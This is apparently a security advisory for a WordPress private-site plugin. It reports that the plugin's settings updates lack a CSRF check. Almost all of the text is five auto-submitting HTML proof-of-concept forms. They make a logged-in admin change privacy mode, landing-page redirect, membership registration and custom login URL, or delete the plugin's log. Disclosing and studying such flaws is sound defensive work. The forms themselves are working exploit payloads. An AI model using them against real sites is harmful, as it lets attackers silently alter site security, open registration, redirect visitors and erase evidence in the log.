The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack
<form id="test" action="https://example.com/wp-admin/admin-post.php" method="POST">
<input type="text" name="action" value="my_private_site_tab_site_privacy">
<input type="text" name="jr_ps_admin_advanced_compatibility_mode" value="STANDARD">
<input type="text" name="jr_ps_button_site_privacy_save" value="Save Privacy Status">
</form>
<script>
document.getElementById("test").submit();
</script>
<form id="test" action="https://example.com/wp-admin/admin-post.php" method="POST">
<input type="text" name="action" value="my_private_site_tab_landing_page">
<input type="text" name="jr_ps_admin_landing_page_option" value="url">
<input type="text" name="jr_ps_admin_landing_page_url" value="https://example.com/whatever">
<input type="text" name="jr_ps_button_landing_page_save" value="Save Landing Page">
</form>
<script>
document.getElementById("test").submit();
</script>
<form id="test" action="https://example.com/wp-admin/admin-post.php" method="POST">
<input type="text" name="action" value="my_private_site_tab_membership">
<input type="text" name="jr_ps_admin_membership_register" value="on">
<input type="text" name="jr_ps_admin_membership_reveal" value="on">
<input type="text" name="jr_ps_button_membership_save" value="Update Options">
</form>
<script>
document.getElementById("test").submit();
</script>
<form id="test" action="https://example.com/wp-admin/admin-post.php" method="POST">
<input type="text" name="action" value="my_private_site_tab_advanced">
<input type="text" name="jr_ps_admin_advanced_enable_custom_login" value="on">
<input type="text" name="jr_ps_admin_advanced_url" value="https://example.com.google.com">
<input type="text" name="jr_ps_admin_advanced_password_reset_url" value="">
<input type="text" name="jr_ps_button_advanced_save" value="Save Advanced Options">
<input type="text" name="my_private_site_system_information" value="The log is empty.">
</form>
<script>
document.getElementById("test").submit();
</script>
<form id="test" action="https://example.com/wp-admin/admin-post.php" method="POST">
<input type="text" name="action" value="my_private_site_tab_advanced">
<input type="text" name="jr_ps_admin_advanced_url" value="">
<input type="text" name="jr_ps_admin_advanced_password_reset_url" value="">
<input type="text" name="my_private_site_system_information" value="The log is empty.">
<input type="text" name="jr_ps_button_settings_logs_delete" value="Delete Log">
</form>
<script>
document.getElementById("test").submit();
</script>